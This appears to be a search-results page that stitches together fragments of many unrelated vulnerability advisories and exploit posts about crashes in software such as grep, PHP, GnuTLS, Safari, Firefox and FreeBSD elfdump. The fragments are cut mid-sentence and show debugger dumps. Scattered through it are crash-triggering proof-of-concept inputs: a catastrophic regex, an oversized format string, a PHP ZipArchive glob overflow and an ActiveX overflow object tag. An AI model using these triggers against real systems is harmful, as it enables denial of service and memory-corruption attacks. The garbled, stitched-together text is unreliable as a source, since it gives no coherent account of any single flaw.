Next Page >>
Access violation
return 0;
}
# /usr/local/bin/gcc -o jaja2 jaja2.c
# ./jaja2 512
Segmentation fault (core dumped)
# /usr/local/bin/gdb -q jaja2
(no debugging symbols found)
(gdb) r 512
Starting program: /jaja2 512
(no debugging symbols found)
127# pwd
/home/cxib
127# du /home/
4 /home/cxib/.ssh
Segmentation fault (core dumped)
127# rm -rf Samotnosc
Segmentation fault (core dumped)
127# chmod -R 000 Samotnosc
Segmentation fault (core dumped)
They are many vectors attack
grep(1):
cx@cx64:~$ ls |grep -E ".*{10,}{10,}{10,}{10,}{10,}"
Segmentation fault
pgrep(1):
cx@cx64:~$ pgrep ".*{10,}{10,}{10,}{10,}{10,}"
Segmentation fault
we need use 1..8000 or bigger value to make stack overflow.
in result
# du X
Segmentation fault (core dumped)
# /usr/local/bin/gdb -q du
(no debugging symbols found)
(gdb) r X
Starting program: /usr/bin/du X
(no debugging symbols found)
and compile it, we can manipulate format string.
Let's try to run example:
cxib# ./pln %99999999999999999999n
Segmentation fault (core dumped)
What is wrong? Let's see
cxib# gdb -q pln
(no debugging symbols found)...(gdb) r %99999999999999999999n
1. In a PE file, the IMAGE_IMPORT_DESCRIPTOR contains fields named
OriginalFirstThunk and FirstThunk. Both of them point to an array of
IMAGE_THUNK_DATA structures. The structure may contain an RVA address
of the name of the imported function. If this pointer to the name of
the function is invalid, Fileinfo raises an Access Violation
exception, which being unhandled, causes Denial of Service condition.
This ends up terminating both Fileinfo plugin and the Total Commander
process.
2. In a PE file, the IMAGE_EXPORT_DIRECTORY contains a field named
iconv(1, $a, 1);
?>
(gdb)run 1.php
Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread -1217608000 (LWP 29444)]
0xb76ed3e5 in iconv_close () from /lib/tls/libc.so.6
2) iconv_mime_decode_headers()
uint8 padding_length;
};
*/
} GenericBlockCipher;
This will cause a segmentation fault, when the ciphertext_to_compressed
function tries to give decrypted data to _gnutls_auth_cipher_add_auth for HMAC
verification, even though the data length is invalid, and it should have
returned GNUTLS_E_DECRYPTION_FAILED or GNUTLS_E_UNEXPECTED_PACKET_LENGTH
instead, before _gnutls_auth_cipher_add_auth was called.
maybe I have formulated badly this question. I mean that if we can overwrite return address of the function properly ( without access violation ) then we can overwrite SEH properly ( without access violation ) and if we can overwrite SEH properly then we can overwrite return address properly. So it seems ( for me ) that SEH overwrite is equivalent to return address overwrite. Since return address is more simple to handle, so there is no need to play with SEH. So why hackers play with it? ( I talk there only about defualt SEH, which is encountered during access violation - i.e http://www.milw0rm.com/exploits/4651 ) Maybe I miss something very important there.
best,
opexoc
Execution of code : NO
Privilege scalation : NO
Discovered by : INTECO-CERT - David Reguera Garcia <david.reguera@inteco.es>
Exploit by : INTECO-CERT - David Reguera Garcia <david.reguera@inteco.es>
Description : When elfdump analyzes an "evil" elf, the application crashes
and causes a Segmentation fault: 11
Affected OS:
- FreeBSD:
- 5.5 - TESTED AND FOUND
- 6.2 - TESTED AND FOUND
- 6.3 - TESTED AND FOUND
<?php
unlink("empty.zip");
fopen("empty.zip","a");
$nx=new ZipArchive();$nx->open("empty.zip");$nx->addGlob(str_repeat("*",333333),0x39);
?>cx@cx64:/www$ php zip.php
Segmentation fault
---linux/ubuntu---
Tested with NetBSD glob(3) implementation (netbsd 5.1 and PHP 5.3.6)
to see difference
[cx@82 /www]$ php define.php 8999999
Out of memory
[cx@82 /www]$ php define.php 9999999
Segmentation fault: 11
(gdb) bt
#0 0x28745eb0 in strrchr () from /lib/libc.so.7
#1 0x0822d538 in zend_register_constant (c=0xbfbfcfb0)
at /usr/ports/lang/php5/work/php/Zend/zend_constants.c:429
Authentication is required to exploit this vulnerability.
Debugger Results:
(ea8.aec): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=41414141 ebx=734c4d90 ecx=035efe24 edx=00000193 esi=035efe24 edi=035efe24
eip=62408f23 esp=035efd20 ebp=035efd6c iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
could not find
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAA"
%SYSTEM-F-ACCVIO,
access violation, reason mask=00, virtual address=4141414141414140,
PC=4141414141414140, PS=0000001B%SYSTEM-F-ACCVIO, access violation,
reason mask=00, virtual address=4141414141414140, PC=4141414141414140,
PS=0000001B Improperly handled condition, image exit forced.
Improperly handled condition, image exit forced. Signal arguments:
Number = 0000000000000005
functional exploit
(URL of the demo can be found in the references section of this advisory)
It should be denoted that the vulnerable code is wrapped by an SEH
handler which doesn't
crash the application on Access Violation. This means that the
exploitation process may
try different base addresses and offsets in case of a failure.
Attack vector:
Title: Firefox 3.6.3 (latest) <= memory exhaustion crash vulnerabilities
0x01. Description:
Memory exhaustion of Firefox 3.6.3 (latest) <= makes firefox can't make texts into body element and then it crashed.
( raise exception using PoC #1, lower memory area read access violation using PoC #2 )
Ofcourse an variation PoC made NULL Pointer deref so may also could be code execution ( 0.1 % ). :-)
URL: http://www.x90c.org/advisories/firefox_3.6.3_crash_advisory.txt
Vendor Status: unpatched. ( to now... doesn't exists any reliable exploit so i disclosed to bugtraq firstly )
Buffer Overflow in AxRUploadServer.dll, this file belongs to ImageStation that is a servicemark of Sony Electronics Inc.
--------------
Access Violation at 0x42424242
The code:
<object classid='clsid:E9A7F56F-C40F-4928-8C6F-7A72F2A25222' id='bof'></object>
<input language=VBScript onclick=Son() type=button value="Explotar">
22/06/2010 14:53:36.650 editcp (372968) Recibida seal (sig=11).
bash-3.2# /tmp/dbx -C core
reading symbolic information ...warning: no source compiled with -g
Segmentation fault in lsConnectionCached at 0x10008298
0x10008298 (lsConnectionCached+0x54) 7d69582e lwzx r11,r9,r11
(/tmp/dbx) where
lsConnectionCached(0x41ffffff) at 0x10008298
SOCKSclose(0x41ffffff) at 0x10006548
============================
The crash is not immediate, but there are actually two ways to trigger it and I believe they are separate problems.
The following will cause Safari to crash with “Access violation reading [00000000]”.
* Window->Activity
Whereas these will crash Safari with “Access violation writing to [BBADBEEF]”
"C:\Oracle\Middleware3\EPMSystem11R1\products\biplus\\bin\\brioqry.exe" "%1"
crash dump, eip and seh overwritten, unicode expanded,
I suppose one should be able to deal with it :
(208.152c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0000008b ebx=00000000 ecx=0e752eb8 edx=0f490000 esi=0e6b3d60 edi=0012a338
eip=00410043 esp=0012a2d8 ebp=0012a2ec iopl=0 nv up ei ng nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010286
Apple Safari is the default web browser included on Apple iPhone. A
vulnerability has been found on the 'WebKit' library used by Safari
inside iPhone. By inserting a special string on the 'alert()' JavaScript
method, it's possible to crash Safari via an outbound memory read
triggering an access violation.
4. *Vulnerable packages*
. iPhone v1.1.4 and v2.0
668E239A F3:A5 REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI] <----- Crash Here
EDI = 0x089A0020
ESI = 0x61626364
(3e8.e3c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=61626560 ebx=00000000 ecx=0000007f edx=00000000 esi=61626364 edi=06d80020
eip=668e239a esp=0012dfbc ebp=0012dfc4 iopl=0 nv up ei pl nz na pe nc
...
}
--- CUT ---
Because variable 'in' is type 'char', characters above 0x80 lead to negative indices.
This vulnerability may lead out-of-boud read and theoretically cause Segmentation Fault (Denial of Service attack).
Unfortunately I couldn't find any binaries where .rodata section before the base64_reverse_table
table cause this situation.
I have added some extra debug in the lighttpd source code to see if this vulnerability is
executed correctly. Here is output for one of the example:
> could not find
> "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAA"
> %SYSTEM-F-ACCVIO,
> access violation, reason mask=00, virtual address=4141414141414140,
> PC=4141414141414140, PS=0000001B%SYSTEM-F-ACCVIO, access violation,
> reason mask=00, virtual address=4141414141414140, PC=4141414141414140,
> PS=0000001B Improperly handled condition, image exit forced.
> Improperly handled condition, image exit forced. Signal arguments:
> Number = 0000000000000005
This attempt to connect to the domain after the @ user and use the first word or letters that we have, this is not today because it is obvious that the first two are together and the second most of the browser asks for permission to such action. What's going on safari in this technique that makes it possible to do this not just to you and asks permission to enter site, the second is that there is some character who safari interprets as "invisible" by creating a link with that of user domain fake followed by a large number of characters "invisible" and lastly with the @ domain to enter this will lead to falsification of the site.
Another flaw is that the safari when writing on the same page with a "document.write" with an infinite while this may result in the browser is broken, causing the following fall
Access violation when writing to [0FDFFFEE]
Finally there is a certain character that causes safari break when it comes to making a link to "file: / /" this creates the following as a result fails
Access violation when reading [00000004]
(gdb) r -X
Starting program: /usr/local/apache/bin/httpd -X
[Sun Dec 27 05:03:19 2009] [alert] httpd: Could not determine the server's fully
qualified domain name, using 127.0.0.1 for ServerName
Program received signal SIGSEGV, Segmentation fault.
0x0000003fec682958 in memcpy () from /lib64/libc.so.6
Missing separate debuginfos, use: debuginfo-install expat-2.0.1-6.fc11.1.x86_64
glibc-2.10.1-5.x86_64 nss-softokn-freebl-3.12.4-3.fc11.x86_64
(gdb) bt
#0 0x0000003fec682958 in memcpy () from /lib64/libc.so.6
ModLoad: 5b860000 5b8b4000 C:\WINDOWS\system32\NETAPI32.dll
ModLoad: 769c0000 76a73000 C:\WINDOWS\system32\USERENV.dll
(26c8.1818): Access violation - code c0000005 (!!! second chance !!!)
eax=00000000 ebx=019dc690 ecx=00000000 edx=00000000 esi=0199ffb0 edi=0199fe20
eip=0036a9ba esp=0012d864 ebp=0037b3e0 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
*** WARNING: Unable to verify checksum for C:\Program Files\Xilisoft\Video Converter 3\avformat.dll
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Xilisoft\Video Converter 3\avformat.dll -
avformat!yuv4mpeg_init+0x6e06:
0036a9ba 8a6811 mov ch,byte ptr [eax+11h] ds:0023:00000011=??
who known?
5 Crash info:
===============
(d10.ff4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=01fff21d ebx=00000000 ecx=0367ffb0 edx=00000076 esi=019c5ff8
edi=03610e68
eip=675b347e esp=02314de0 ebp=02314e24 iopl=0 nv up ei pl nz na
Note (added 30/05/2009, remote vector added): it works with network folders
too ...
against a win2k3 where explorer.exe is not patched with /GS flag:
(f44.104): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=02100068 ebx=772a23c1 ecx=0210cefa edx=00000823 esi=00610061 edi=00000000
eip=772a533f esp=0210cec0 ebp=0210cec4 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
faultmon dump of oovoo.exe processing the url given:
...
04:22:10.875 pid=0E10 tid=0C08 EXCEPTION (first-chance)
----------------------------------------------------------------
Exception C0000005 (ACCESS_VIOLATION reading [0000005A])
----------------------------------------------------------------
EAX=00000066: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EBX=00133D44: 6F 00 6F 00 76 00 6F 00-6F 00 3A 00 00 00 0F 00
ECX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EDX=01D0DC28: 63 00 61 00 6C 00 6C 00-74 00 6F 00 3A 00 00 00
Next Page>>
|
